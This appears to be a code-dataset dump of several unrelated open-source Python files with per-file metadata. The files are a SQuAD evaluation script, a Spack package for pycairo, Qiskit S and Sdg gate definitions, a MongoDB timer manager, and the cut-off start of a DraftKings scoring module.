help='Predict "" if no-answer probability exceeds this (default = 1.0).')
parser.add_argument('--out-image-dir', '-p', metavar='out_images', default=None,
help='Save precision-recall curves to directory.')
parser.add_argument('--verbose', '-v', action='store_true')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
return parser.parse_args()
def make_qid_to_has_ans(dataset):
qid_to_has_ans = {}
for article in dataset:
for p in article['paragraphs']:
for qa in p['qas']:
qid_to_has_ans[qa['id']] = bool(qa['answers'])
return qid_to_has_ans
def normalize_answer(s):
def remove_articles(text):
regex = re.compile(r'\b(a|an|the)\b', re.UNICODE)
return re.sub(regex, ' ', text)
def white_space_fix(text):
return ' '.join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return ''.join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
def get_tokens(s):
if not s: return []
return normalize_answer(s).split()
def compute_exact(a_gold, a_pred):
return int(normalize_answer(a_gold) == normalize_answer(a_pred))
def compute_f1(a_gold, a_pred):
gold_toks = get_tokens(a_gold)
pred_toks = get_tokens(a_pred)
common = collections.Counter(gold_toks) & collections.Counter(pred_toks)
num_same = sum(common.values())
if len(gold_toks) == 0 or len(pred_toks) == 0:
return int(gold_toks == pred_toks)
if num_same == 0:
return 0
precision = 1.0 * num_same / len(pred_toks)
recall = 1.0 * num_same / len(gold_toks)
f1 = (2 * precision * recall) / (precision + recall)
return f1
def get_raw_scores(dataset, preds):
exact_scores = {}
f1_scores = {}
for article in dataset:
for p in article['paragraphs']:
for qa in p['qas']:
qid = qa['id']
gold_answers = [a['text'] for a in qa['answers']
if normalize_answer(a['text'])]
if not gold_answers:
gold_answers = ['']
if qid not in preds:
print('Missing prediction for %s' % qid)
continue
a_pred = preds[qid]
exact_scores[qid] = max(compute_exact(a, a_pred) for a in gold_answers)
f1_scores[qid] = max(compute_f1(a, a_pred) for a in gold_answers)
return exact_scores, f1_scores
def apply_no_ans_threshold(scores, na_probs, qid_to_has_ans, na_prob_thresh):
new_scores = {}
for qid, s in scores.items():
pred_na = na_probs[qid] > na_prob_thresh
if pred_na:
new_scores[qid] = float(not qid_to_has_ans[qid])
else:
new_scores[qid] = s
return new_scores
def make_eval_dict(exact_scores, f1_scores, qid_list=None):
if not qid_list:
total = len(exact_scores)
return collections.OrderedDict([
('exact', 100.0 * sum(exact_scores.values()) / total),
('f1', 100.0 * sum(f1_scores.values()) / total),
('total', total),
])
else:
total = len(qid_list)
return collections.OrderedDict([
('exact', 100.0 * sum(exact_scores[k] for k in qid_list) / total),
('f1', 100.0 * sum(f1_scores[k] for k in qid_list) / total),
('total', total),
])
def merge_eval(main_eval, new_eval, prefix):
for k in new_eval:
main_eval['%s_%s' % (prefix, k)] = new_eval[k]
def plot_pr_curve(precisions, recalls, out_image, title):
plt.step(recalls, precisions, color='b', alpha=0.2, where='post')
plt.fill_between(recalls, precisions, step='post', alpha=0.2, color='b')
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.xlim([0.0, 1.05])
plt.ylim([0.0, 1.05])
plt.title(title)
plt.savefig(out_image)
plt.clf()
def make_precision_recall_eval(scores, na_probs, num_true_pos, qid_to_has_ans,
out_image=None, title=None):
qid_list = sorted(na_probs, key=lambda k: na_probs[k])
true_pos = 0.0
cur_p = 1.0
cur_r = 0.0
precisions = [1.0]
recalls = [0.0]
avg_prec = 0.0
for i, qid in enumerate(qid_list):
if qid_to_has_ans[qid]:
true_pos += scores[qid]
cur_p = true_pos / float(i+1)
cur_r = true_pos / float(num_true_pos)
if i == len(qid_list) - 1 or na_probs[qid] != na_probs[qid_list[i+1]]:
avg_prec += cur_p * (cur_r - recalls[-1])
precisions.append(cur_p)
recalls.append(cur_r)
if out_image:
plot_pr_curve(precisions, recalls, out_image, title)
return {'ap': 100.0 * avg_prec}
def run_precision_recall_analysis(main_eval, exact_raw, f1_raw, na_probs,
qid_to_has_ans, out_image_dir):
if out_image_dir and not os.path.exists(out_image_dir):
os.makedirs(out_image_dir)
num_true_pos = sum(1 for v in qid_to_has_ans.values() if v)
if num_true_pos == 0:
return
pr_exact = make_precision_recall_eval(
exact_raw, na_probs, num_true_pos, qid_to_has_ans,
out_image=os.path.join(out_image_dir, 'pr_exact.png'),
title='Precision-Recall curve for Exact Match score')
pr_f1 = make_precision_recall_eval(
f1_raw, na_probs, num_true_pos, qid_to_has_ans,
out_image=os.path.join(out_image_dir, 'pr_f1.png'),
title='Precision-Recall curve for F1 score')
oracle_scores = {k: float(v) for k, v in qid_to_has_ans.items()}
pr_oracle = make_precision_recall_eval(
oracle_scores, na_probs, num_true_pos, qid_to_has_ans,
out_image=os.path.join(out_image_dir, 'pr_oracle.png'),
title='Oracle Precision-Recall curve (binary task of HasAns vs. NoAns)')
merge_eval(main_eval, pr_exact, 'pr_exact')
merge_eval(main_eval, pr_f1, 'pr_f1')
merge_eval(main_eval, pr_oracle, 'pr_oracle')
def histogram_na_prob(na_probs, qid_list, image_dir, name):
if not qid_list:
return
x = [na_probs[k] for k in qid_list]
weights = np.ones_like(x) / float(len(x))
plt.hist(x, weights=weights, bins=20, range=(0.0, 1.0))
plt.xlabel('Model probability of no-answer')
plt.ylabel('Proportion of dataset')
plt.title('Histogram of no-answer probability: %s' % name)
plt.savefig(os.path.join(image_dir, 'na_prob_hist_%s.png' % name))
plt.clf()
def find_best_thresh(preds, scores, na_probs, qid_to_has_ans):
num_no_ans = sum(1 for k in qid_to_has_ans if not qid_to_has_ans[k])
cur_score = num_no_ans
best_score = cur_score
best_thresh = 0.0
qid_list = sorted(na_probs, key=lambda k: na_probs[k])
for i, qid in enumerate(qid_list):
if qid not in scores: continue
if qid_to_has_ans[qid]:
diff = scores[qid]
else:
if preds[qid]:
diff = -1
else:
diff = 0
cur_score += diff
if cur_score > best_score:
best_score = cur_score
best_thresh = na_probs[qid]
return 100.0 * best_score / len(scores), best_thresh
def find_all_best_thresh(main_eval, preds, exact_raw, f1_raw, na_probs, qid_to_has_ans):
best_exact, exact_thresh = find_best_thresh(preds, exact_raw, na_probs, qid_to_has_ans)
best_f1, f1_thresh = find_best_thresh(preds, f1_raw, na_probs, qid_to_has_ans)
main_eval['best_exact'] = best_exact
main_eval['best_exact_thresh'] = exact_thresh
main_eval['best_f1'] = best_f1
main_eval['best_f1_thresh'] = f1_thresh
def main():
with open(OPTS.data_file) as f:
dataset_json = json.load(f)
dataset = dataset_json['data']
with open(OPTS.pred_file) as f:
preds = json.load(f)
if OPTS.na_prob_file:
with open(OPTS.na_prob_file) as f:
na_probs = json.load(f)
else:
na_probs = {k: 0.0 for k in preds}
qid_to_has_ans = make_qid_to_has_ans(dataset)
has_ans_qids = [k for k, v in qid_to_has_ans.items() if v]
no_ans_qids = [k for k, v in qid_to_has_ans.items() if not v]
exact_raw, f1_raw = get_raw_scores(dataset, preds)
exact_thresh = apply_no_ans_threshold(exact_raw, na_probs, qid_to_has_ans,
OPTS.na_prob_thresh)
f1_thresh = apply_no_ans_threshold(f1_raw, na_probs, qid_to_has_ans,
OPTS.na_prob_thresh)
out_eval = make_eval_dict(exact_thresh, f1_thresh)
if has_ans_qids:
has_ans_eval = make_eval_dict(exact_thresh, f1_thresh, qid_list=has_ans_qids)
merge_eval(out_eval, has_ans_eval, 'HasAns')
if no_ans_qids:
no_ans_eval = make_eval_dict(exact_thresh, f1_thresh, qid_list=no_ans_qids)
merge_eval(out_eval, no_ans_eval, 'NoAns')
if OPTS.na_prob_file:
find_all_best_thresh(out_eval, preds, exact_raw, f1_raw, na_probs, qid_to_has_ans)
if OPTS.na_prob_file and OPTS.out_image_dir:
run_precision_recall_analysis(out_eval, exact_raw, f1_raw, na_probs,
qid_to_has_ans, OPTS.out_image_dir)
histogram_na_prob(na_probs, has_ans_qids, OPTS.out_image_dir, 'hasAns')
histogram_na_prob(na_probs, no_ans_qids, OPTS.out_image_dir, 'noAns')
if OPTS.out_file:
with open(OPTS.out_file, 'w') as f:
json.dump(out_eval, f)
else:
print(json.dumps(out_eval, indent=2))
def judgeOnline(data_file,pred_file,na_prob_file,output_dir,epoch,train_steps):
if not os.path.exists(os.path.join(output_dir,"eval_res")):
os.makedirs(os.path.join(output_dir,"eval_res"))
output = os.path.join(output_dir,"eval_res")
out_file = os.path.join(output,"eval.json")
out_image_dir = None
na_prob_thresh = 1.0
with open(data_file) as f:
dataset_json = json.load(f)
dataset = dataset_json['data']
with open(pred_file) as f:
preds = json.load(f)
with open(na_prob_file) as f:
na_probs = json.load(f)
exact_raw, f1_raw = get_raw_scores(dataset, preds)
qid_to_has_ans = make_qid_to_has_ans(dataset)
has_ans_qids = [k for k, v in qid_to_has_ans.items() if v]
no_ans_qids = [k for k, v in qid_to_has_ans.items() if not v]
exact_thresh = apply_no_ans_threshold(exact_raw, na_probs, qid_to_has_ans,
na_prob_thresh)
f1_thresh = apply_no_ans_threshold(f1_raw, na_probs, qid_to_has_ans,
na_prob_thresh)
out_eval = make_eval_dict(exact_thresh, f1_thresh)
if has_ans_qids:
has_ans_eval = make_eval_dict(exact_thresh, f1_thresh, qid_list=has_ans_qids)
merge_eval(out_eval, has_ans_eval, 'HasAns')
if no_ans_qids:
no_ans_eval = make_eval_dict(exact_thresh, f1_thresh, qid_list=no_ans_qids)
merge_eval(out_eval, no_ans_eval, 'NoAns')
if na_prob_file:
find_all_best_thresh(out_eval, preds, exact_raw, f1_raw, na_probs, qid_to_has_ans)
if na_prob_file and out_image_dir:
run_precision_recall_analysis(out_eval, exact_raw, f1_raw, na_probs,
qid_to_has_ans, out_image_dir)
histogram_na_prob(na_probs, has_ans_qids, out_image_dir, 'hasAns')
histogram_na_prob(na_probs, no_ans_qids, out_image_dir, 'noAns')
if out_file:
with open(out_file, 'a') as fout:
fout.write("epoch:{} steps:{} evaluation res:{}\n".format(epoch,train_steps,json.dumps(out_eval, sort_keys=True, indent=2)))
import logging
logger = logging.getLogger(__name__)
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt='%m/%d/%Y %H:%M:%S',
level=logging.INFO )
logger.info("write evaluation result to " + out_file + "OK!")
else:
print(json.dumps(out_eval, indent=2))
return out_eval
if __name__ == '__main__':
OPTS = parse_args()
if OPTS.out_image_dir:
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
print(vars(OPTS))
main()
| true
| true
|
f707c66759e748052baf1d1b8d95b91737e37c5f
| 1,421
|
py
|
Python
|
var/spack/repos/builtin/packages/py-pycairo/package.py
|
LiamBindle/spack
|
e90d5ad6cfff2ba3de7b537d6511adccd9d5fcf1
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2,360
|
2017-11-06T08:47:01.000Z
|
2022-03-31T14:45:33.000Z
|
var/spack/repos/builtin/packages/py-pycairo/package.py
|
LiamBindle/spack
|
e90d5ad6cfff2ba3de7b537d6511adccd9d5fcf1
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 13,838
|
2017-11-04T07:49:45.000Z
|
2022-03-31T23:38:39.000Z
|
var/spack/repos/builtin/packages/py-pycairo/package.py
|
LiamBindle/spack
|
e90d5ad6cfff2ba3de7b537d6511adccd9d5fcf1
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 1,793
|
2017-11-04T07:45:50.000Z
|
2022-03-30T14:31:53.000Z
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import os
from spack import *
class PyPycairo(PythonPackage):
"""Pycairo is a set of Python bindings for the cairo graphics library."""
homepage = "https://www.cairographics.org/pycairo/"
pypi = "pycairo/pycairo-1.17.1.tar.gz"
version('1.20.0', sha256='5695a10cb7f9ae0d01f665b56602a845b0a8cb17e2123bfece10c2e58552468c')
version('1.18.1', sha256='70172e58b6bad7572a3518c26729b074acdde15e6fee6cbab6d3528ad552b786')
version('1.17.1', sha256='0f0a35ec923d87bc495f6753b1e540fd046d95db56a35250c44089fbce03b698')
depends_on('cairo@1.15.10: +pdf', when='@1.20.0:')
depends_on('cairo@1.13.1: +pdf', when='@:1.18.1')
depends_on('pkgconfig', type='build')
depends_on('py-setuptools', type='build')
depends_on('python@2.7:2.8,3.3:', when='@:1.17.1', type=('build', 'run'))
depends_on('python@2.7:2.8,3.4:3.7', when='@1.18.1:1.19', type=('build', 'run'))
depends_on('python@3.6:3', when='@1.20.0:', type=('build', 'run'))
@run_after('install')
def post_install(self):
src = self.prefix.lib + '/pkgconfig/py3cairo.pc'
dst = self.prefix.lib + '/pkgconfig/pycairo.pc'
if os.path.exists(src) and not os.path.exists(dst):
copy(src, dst)
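# --- Illustrative note (not part of the original package) ---
# Upstream pycairo installs only 'py3cairo.pc'; the copy above also exposes
# the bindings under the name 'pycairo', so a dependent build that runs
#
#     pkg-config --cflags pycairo
#
# still resolves even when upstream does not ship a 'pycairo.pc' itself.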
| 40.6
| 96
| 0.68121
|
import os
from spack import *
class PyPycairo(PythonPackage):
homepage = "https://www.cairographics.org/pycairo/"
pypi = "pycairo/pycairo-1.17.1.tar.gz"
version('1.20.0', sha256='5695a10cb7f9ae0d01f665b56602a845b0a8cb17e2123bfece10c2e58552468c')
version('1.18.1', sha256='70172e58b6bad7572a3518c26729b074acdde15e6fee6cbab6d3528ad552b786')
version('1.17.1', sha256='0f0a35ec923d87bc495f6753b1e540fd046d95db56a35250c44089fbce03b698')
depends_on('cairo@1.15.10: +pdf', when='@1.20.0:')
depends_on('cairo@1.13.1: +pdf', when='@:1.18.1')
depends_on('pkgconfig', type='build')
depends_on('py-setuptools', type='build')
depends_on('python@2.7:2.8,3.3:', when='@:1.17.1', type=('build', 'run'))
depends_on('python@2.7:2.8,3.4:3.7', when='@1.18.1:1.19', type=('build', 'run'))
depends_on('python@3.6:3', when='@1.20.0:', type=('build', 'run'))
@run_after('install')
def post_install(self):
src = self.prefix.lib + '/pkgconfig/py3cairo.pc'
dst = self.prefix.lib + '/pkgconfig/pycairo.pc'
if os.path.exists(src) and not os.path.exists(dst):
copy(src, dst)
| true
| true
|
f707c6739dae4cd8d9569f54bb93dba89cc51996
| 3,303
|
py
|
Python
|
qiskit/circuit/library/standard_gates/s.py
|
yeralin/qiskit-terra
|
251930a7b5d83af121ea0f3aafb33a54a1860e14
|
[
"Apache-2.0"
] | 1
|
2020-10-25T17:56:57.000Z
|
2020-10-25T17:56:57.000Z
|
qiskit/circuit/library/standard_gates/s.py
|
yeralin/qiskit-terra
|
251930a7b5d83af121ea0f3aafb33a54a1860e14
|
[
"Apache-2.0"
] | null | null | null |
qiskit/circuit/library/standard_gates/s.py
|
yeralin/qiskit-terra
|
251930a7b5d83af121ea0f3aafb33a54a1860e14
|
[
"Apache-2.0"
] | null | null | null |
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""The S and Sdg gate."""
import numpy
from qiskit.qasm import pi
from qiskit.circuit.gate import Gate
from qiskit.circuit.quantumregister import QuantumRegister
class SGate(Gate):
r"""Single qubit S gate (Z**0.5).
It induces a :math:`\pi/2` phase, and is sometimes called the P gate (phase).
This is a Clifford gate and a square-root of Pauli-Z.
**Matrix Representation:**
.. math::
S = \begin{pmatrix}
1 & 0 \\
0 & i
\end{pmatrix}
**Circuit symbol:**
.. parsed-literal::
┌───┐
q_0: ┤ S ├
└───┘
Equivalent to a :math:`\pi/2` radian rotation about the Z axis.
"""
def __init__(self, label=None):
"""Create new S gate."""
super().__init__('s', 1, [], label=label)
def _define(self):
"""
gate s a { u1(pi/2) a; }
"""
# pylint: disable=cyclic-import
from qiskit.circuit.quantumcircuit import QuantumCircuit
from .u1 import U1Gate
q = QuantumRegister(1, 'q')
qc = QuantumCircuit(q, name=self.name)
rules = [
(U1Gate(pi / 2), [q[0]], [])
]
qc._data = rules
self.definition = qc
def inverse(self):
"""Return inverse of S (SdgGate)."""
return SdgGate()
def to_matrix(self):
"""Return a numpy.array for the S gate."""
return numpy.array([[1, 0],
[0, 1j]], dtype=complex)
class SdgGate(Gate):
r"""Single qubit S-adjoint gate (~Z**0.5).
It induces a :math:`-\pi/2` phase.
This is a Clifford gate and a square-root of Pauli-Z.
**Matrix Representation:**
.. math::
Sdg = \begin{pmatrix}
1 & 0 \\
0 & -i
\end{pmatrix}
**Circuit symbol:**
.. parsed-literal::
┌─────┐
q_0: ┤ Sdg ├
└─────┘
    Equivalent to a :math:`-\pi/2` radian rotation about the Z axis.
"""
def __init__(self, label=None):
"""Create new Sdg gate."""
super().__init__('sdg', 1, [], label=label)
def _define(self):
"""
gate sdg a { u1(-pi/2) a; }
"""
# pylint: disable=cyclic-import
from qiskit.circuit.quantumcircuit import QuantumCircuit
from .u1 import U1Gate
q = QuantumRegister(1, 'q')
qc = QuantumCircuit(q, name=self.name)
rules = [
(U1Gate(-pi / 2), [q[0]], [])
]
qc._data = rules
self.definition = qc
def inverse(self):
"""Return inverse of Sdg (SGate)."""
return SGate()
def to_matrix(self):
"""Return a numpy.array for the Sdg gate."""
return numpy.array([[1, 0],
[0, -1j]], dtype=complex)
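# --- Illustrative check (not part of the original module) ---
# S is a square root of Pauli-Z and Sdg is its inverse, which can be
# verified numerically from the matrices defined above:
#
#     import numpy as np
#     s = SGate().to_matrix()
#     sdg = SdgGate().to_matrix()
#     assert np.allclose(s @ s, np.diag([1, -1]))  # S**2 == Z
#     assert np.allclose(s @ sdg, np.eye(2))       # Sdg == S^-1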
| 25.21374
| 81
| 0.544051
|
import numpy
from qiskit.qasm import pi
from qiskit.circuit.gate import Gate
from qiskit.circuit.quantumregister import QuantumRegister
class SGate(Gate):
def __init__(self, label=None):
super().__init__('s', 1, [], label=label)
def _define(self):
from qiskit.circuit.quantumcircuit import QuantumCircuit
from .u1 import U1Gate
q = QuantumRegister(1, 'q')
qc = QuantumCircuit(q, name=self.name)
rules = [
(U1Gate(pi / 2), [q[0]], [])
]
qc._data = rules
self.definition = qc
def inverse(self):
return SdgGate()
def to_matrix(self):
return numpy.array([[1, 0],
[0, 1j]], dtype=complex)
class SdgGate(Gate):
def __init__(self, label=None):
super().__init__('sdg', 1, [], label=label)
def _define(self):
from qiskit.circuit.quantumcircuit import QuantumCircuit
from .u1 import U1Gate
q = QuantumRegister(1, 'q')
qc = QuantumCircuit(q, name=self.name)
rules = [
(U1Gate(-pi / 2), [q[0]], [])
]
qc._data = rules
self.definition = qc
def inverse(self):
return SGate()
def to_matrix(self):
return numpy.array([[1, 0],
[0, -1j]], dtype=complex)
| true
| true
|
f707c6d480737417d70c708d14c32c7ba550b80b
| 6,151
|
py
|
Python
|
mongodb/factory/timer.py
|
RaenonX/Jelly-Bot-API
|
c7da1e91783dce3a2b71b955b3a22b68db9056cf
|
[
"MIT"
] | 5
|
2020-08-26T20:12:00.000Z
|
2020-12-11T16:39:22.000Z
|
mongodb/factory/timer.py
|
RaenonX/Jelly-Bot
|
c7da1e91783dce3a2b71b955b3a22b68db9056cf
|
[
"MIT"
] | 234
|
2019-12-14T03:45:19.000Z
|
2020-08-26T18:55:19.000Z
|
mongodb/factory/timer.py
|
RaenonX/Jelly-Bot-API
|
c7da1e91783dce3a2b71b955b3a22b68db9056cf
|
[
"MIT"
] | 2
|
2019-10-23T15:21:15.000Z
|
2020-05-22T09:35:55.000Z
|
"""Data manager for the timers."""
from datetime import datetime, timedelta
from typing import Optional, List
import pymongo
from bson import ObjectId
from models import TimerModel, TimerListResult, OID_KEY
from mongodb.factory.results import WriteOutcome
from extutils.checker import arg_type_ensure
from extutils.locales import UTC
from extutils.dt import is_tz_naive, now_utc_aware, make_tz_aware
from JellyBot.systemconfig import Bot
from ._base import BaseCollection
__all__ = ("TimerManager",)
DB_NAME = "timer"
class _TimerManager(BaseCollection):
database_name = DB_NAME
collection_name = "timer"
model_class = TimerModel
def build_indexes(self):
self.create_index(TimerModel.Keyword.key)
self.create_index(TimerModel.DeletionTime.key, expireAfterSeconds=0)
@arg_type_ensure
def add_new_timer(
self, ch_oid: ObjectId, keyword: str, title: str, target_time: datetime, *,
countup: bool = False, period_sec: int = 0) -> WriteOutcome:
"""`target_time` is recommended to be tz-aware. Tzinfo will be forced to be UTC if tz-naive."""
# Force target time to be tz-aware in UTC
if is_tz_naive(target_time):
target_time = make_tz_aware(target_time, UTC.to_tzinfo())
mdl = TimerModel(
ChannelOid=ch_oid, Keyword=keyword, Title=title, TargetTime=target_time,
Countup=countup, PeriodSeconds=period_sec)
if not countup:
mdl.deletion_time = target_time + timedelta(days=Bot.Timer.AutoDeletionDays)
mdl.deletion_time = make_tz_aware(mdl.deletion_time, target_time.tzinfo)
outcome, _ = self.insert_one_model(mdl)
return outcome
@arg_type_ensure
def del_timer(self, timer_oid: ObjectId) -> bool:
"""
Delete the timer by its OID.
:param timer_oid: OID of the timer to be deleted
:return: if the timer was successfully deleted
"""
return self.delete_one({OID_KEY: timer_oid}).deleted_count > 0
@arg_type_ensure
def list_all_timer(self, channel_oid: ObjectId) -> TimerListResult:
"""
List all the timers in the channel ``channel_oid``.
        All timers in the returned result will be sorted by their target time (ASC).
:param channel_oid: channel of the timers
:return: a `TimerListResult` containing the timers that match the conditions
"""
return TimerListResult(
self.find_cursor_with_count(
{TimerModel.ChannelOid.key: channel_oid},
sort=[(TimerModel.TargetTime.key, pymongo.ASCENDING)]
)
)
@arg_type_ensure
def get_timers(self, channel_oid: ObjectId, keyword: str) -> TimerListResult:
"""
        Get the timers in the channel ``channel_oid`` whose keyword is ``keyword``.
``keyword`` needs to be an exact match, **NOT** partial match.
        All timers in the returned result will be sorted by their target time (ASC).
:param channel_oid: channel of the timers
:param keyword: keyword of the timers
:return: a `TimerListResult` containing the timers that match the conditions
"""
return TimerListResult(
self.find_cursor_with_count(
{TimerModel.Keyword.key: keyword, TimerModel.ChannelOid.key: channel_oid},
sort=[(TimerModel.TargetTime.key, pymongo.ASCENDING)]
)
)
@arg_type_ensure
def get_notify(self, channel_oid: ObjectId, within_secs: Optional[int] = None) -> List[TimerModel]:
"""
        Get a list of unnotified timers in ``channel_oid`` which will time up within ``within_secs`` seconds.
        Returned timers will be sorted by their target time (ASC).
        :param channel_oid: channel of the timers
        :param within_secs: timers that will time up within this number of seconds will be returned
        :return: a list of timers that are not yet notified and will time up within `within_secs` seconds
"""
now = now_utc_aware()
filter_ = {
TimerModel.ChannelOid.key: channel_oid,
TimerModel.TargetTime.key: {
"$lt": now + timedelta(seconds=within_secs if within_secs else Bot.Timer.MaxNotifyRangeSeconds),
"$gt": now
},
TimerModel.Notified.key: False
}
ret = list(self.find_cursor_with_count(filter_, sort=[(TimerModel.TargetTime.key, pymongo.ASCENDING)]))
self.update_many_async(filter_, {"$set": {TimerModel.Notified.key: True}})
return ret
@arg_type_ensure
def get_time_up(self, channel_oid: ObjectId) -> List[TimerModel]:
"""
        Get a list of unnotified timers which have already timed up in ``channel_oid``.
        All timers in the returned result will be sorted by their target time (ASC).
        :param channel_oid: channel of the timers
        :return: a list of timers that are not yet notified and have already timed up
"""
now = now_utc_aware()
filter_ = {
TimerModel.ChannelOid.key: channel_oid,
TimerModel.TargetTime.key: {"$lt": now},
TimerModel.NotifiedExpired.key: False
}
ret = list(self.find_cursor_with_count(filter_, sort=[(TimerModel.TargetTime.key, pymongo.ASCENDING)]))
self.update_many_async(filter_, {"$set": {TimerModel.NotifiedExpired.key: True}})
return ret
@staticmethod
def get_notify_within_secs(message_frequency: float):
"""
Get a time range calculated by ``message_frequency`` which can be used to get the timers for notification.
        Calculation formula: **message frequency x 20 + 600**
If the calculated result is greater than ``Bot.Timer.MaxNotifyRangeSeconds``,
then ``Bot.Timer.MaxNotifyRangeSeconds`` will be returned instead.
:param message_frequency: message frequency in seconds per message
:return: time range to be used to get the timers for notification
"""
return min(message_frequency * 20 + 600, Bot.Timer.MaxNotifyRangeSeconds)
TimerManager = _TimerManager()
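# --- Illustrative example (not part of the original module) ---
# get_notify_within_secs() widens the notification window for quieter
# channels but never past the configured cap. For instance, at a message
# frequency of 12 seconds per message the window is 12 * 20 + 600 = 840
# seconds, unless Bot.Timer.MaxNotifyRangeSeconds is smaller:
#
#     window = TimerManager.get_notify_within_secs(12)
#     # channel_oid: any bson ObjectId identifying the target channel
#     upcoming = TimerManager.get_notify(channel_oid, within_secs=int(window))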
| 36.613095
| 114
| 0.664282
|
from datetime import datetime, timedelta
from typing import Optional, List
import pymongo
from bson import ObjectId
from models import TimerModel, TimerListResult, OID_KEY
from mongodb.factory.results import WriteOutcome
from extutils.checker import arg_type_ensure
from extutils.locales import UTC
from extutils.dt import is_tz_naive, now_utc_aware, make_tz_aware
from JellyBot.systemconfig import Bot
from ._base import BaseCollection
__all__ = ("TimerManager",)
DB_NAME = "timer"
class _TimerManager(BaseCollection):
database_name = DB_NAME
collection_name = "timer"
model_class = TimerModel
def build_indexes(self):
self.create_index(TimerModel.Keyword.key)
self.create_index(TimerModel.DeletionTime.key, expireAfterSeconds=0)
@arg_type_ensure
def add_new_timer(
self, ch_oid: ObjectId, keyword: str, title: str, target_time: datetime, *,
countup: bool = False, period_sec: int = 0) -> WriteOutcome:
if is_tz_naive(target_time):
target_time = make_tz_aware(target_time, UTC.to_tzinfo())
mdl = TimerModel(
ChannelOid=ch_oid, Keyword=keyword, Title=title, TargetTime=target_time,
Countup=countup, PeriodSeconds=period_sec)
if not countup:
mdl.deletion_time = target_time + timedelta(days=Bot.Timer.AutoDeletionDays)
mdl.deletion_time = make_tz_aware(mdl.deletion_time, target_time.tzinfo)
outcome, _ = self.insert_one_model(mdl)
return outcome
@arg_type_ensure
def del_timer(self, timer_oid: ObjectId) -> bool:
return self.delete_one({OID_KEY: timer_oid}).deleted_count > 0
@arg_type_ensure
def list_all_timer(self, channel_oid: ObjectId) -> TimerListResult:
return TimerListResult(
self.find_cursor_with_count(
{TimerModel.ChannelOid.key: channel_oid},
sort=[(TimerModel.TargetTime.key, pymongo.ASCENDING)]
)
)
@arg_type_ensure
def get_timers(self, channel_oid: ObjectId, keyword: str) -> TimerListResult:
return TimerListResult(
self.find_cursor_with_count(
{TimerModel.Keyword.key: keyword, TimerModel.ChannelOid.key: channel_oid},
sort=[(TimerModel.TargetTime.key, pymongo.ASCENDING)]
)
)
@arg_type_ensure
def get_notify(self, channel_oid: ObjectId, within_secs: Optional[int] = None) -> List[TimerModel]:
now = now_utc_aware()
filter_ = {
TimerModel.ChannelOid.key: channel_oid,
TimerModel.TargetTime.key: {
"$lt": now + timedelta(seconds=within_secs if within_secs else Bot.Timer.MaxNotifyRangeSeconds),
"$gt": now
},
TimerModel.Notified.key: False
}
ret = list(self.find_cursor_with_count(filter_, sort=[(TimerModel.TargetTime.key, pymongo.ASCENDING)]))
self.update_many_async(filter_, {"$set": {TimerModel.Notified.key: True}})
return ret
@arg_type_ensure
def get_time_up(self, channel_oid: ObjectId) -> List[TimerModel]:
now = now_utc_aware()
filter_ = {
TimerModel.ChannelOid.key: channel_oid,
TimerModel.TargetTime.key: {"$lt": now},
TimerModel.NotifiedExpired.key: False
}
ret = list(self.find_cursor_with_count(filter_, sort=[(TimerModel.TargetTime.key, pymongo.ASCENDING)]))
self.update_many_async(filter_, {"$set": {TimerModel.NotifiedExpired.key: True}})
return ret
@staticmethod
def get_notify_within_secs(message_frequency: float):
return min(message_frequency * 20 + 600, Bot.Timer.MaxNotifyRangeSeconds)
TimerManager = _TimerManager()
| true
| true
|
f707c9b9127d02117714037a1a1e058f1ab6331e
| 7,900
|
py
|
Python
|
daily_fantasy_sports_scoring_calculators/draft_kings/nfl/scoring/calculators/statistical_value_to_points/offensive.py
|
jaebradley/daily_fantasy_sports_scoring_calculators
|
99b7e0443637cb4405ccdad7fa4f136af914307b
|
[
"MIT"
] | null | null | null |
daily_fantasy_sports_scoring_calculators/draft_kings/nfl/scoring/calculators/statistical_value_to_points/offensive.py
|
jaebradley/daily_fantasy_sports_scoring_calculators
|
99b7e0443637cb4405ccdad7fa4f136af914307b
|
[
"MIT"
] | 3
|
2021-09-05T01:40:16.000Z
|
2021-09-20T06:53:54.000Z
|
daily_fantasy_sports_scoring_calculators/draft_kings/nfl/scoring/calculators/statistical_value_to_points/offensive.py
|
jaebradley/daily_fantasy_sports_scoring_calculators
|
99b7e0443637cb4405ccdad7fa4f136af914307b
|
[
"MIT"
] | null | null | null |
from daily_fantasy_sports_scoring_calculators.core.calculators.scoring import StatisticalCategoryPointsCalculator, \
StatisticalValueCalculator
from daily_fantasy_sports_scoring_calculators.draft_kings.nfl.scoring.calculators.value_to_points.offensive import \
PassingTouchdownsCalculator as PassingTouchdownsPointsCalculator, \
HasAchievedAtLeast300YardsCalculator as HasAchievedAtLeast300PassingYardsPointsCalculator, \
PassingYardageCalculator as PassingYardagePointsCalculator, \
HasAchievedAtLeast100YardsCalculator as HasAchievedAtLeast100YardsPointsCalculator, \
NonPassingTouchdownsCalculator as NonPassingTouchdownsPointsCalculator, \
NonPassingYardsCalculator as NonPassingYardsPointsCalculator, \
TurnoversCalculator as TurnoversPointsCalculator, \
TwoPointConversionsCalculator as TwoPointConversionsPointsCalculator, \
ReceptionsCalculator as ReceptionsPointsCalculator
from daily_fantasy_sports_scoring_calculators.draft_kings.nfl.statistics.calculators.offensive import \
PassingTouchdownsCalculator as PassingTouchdownsValueCalculator, \
HasAchievedMinimumYardageRequirementCalculator as HasAchievedMinimumYardageRequirementValueCalculator, \
InterceptionsCalculator as InterceptionsValueCalculator, \
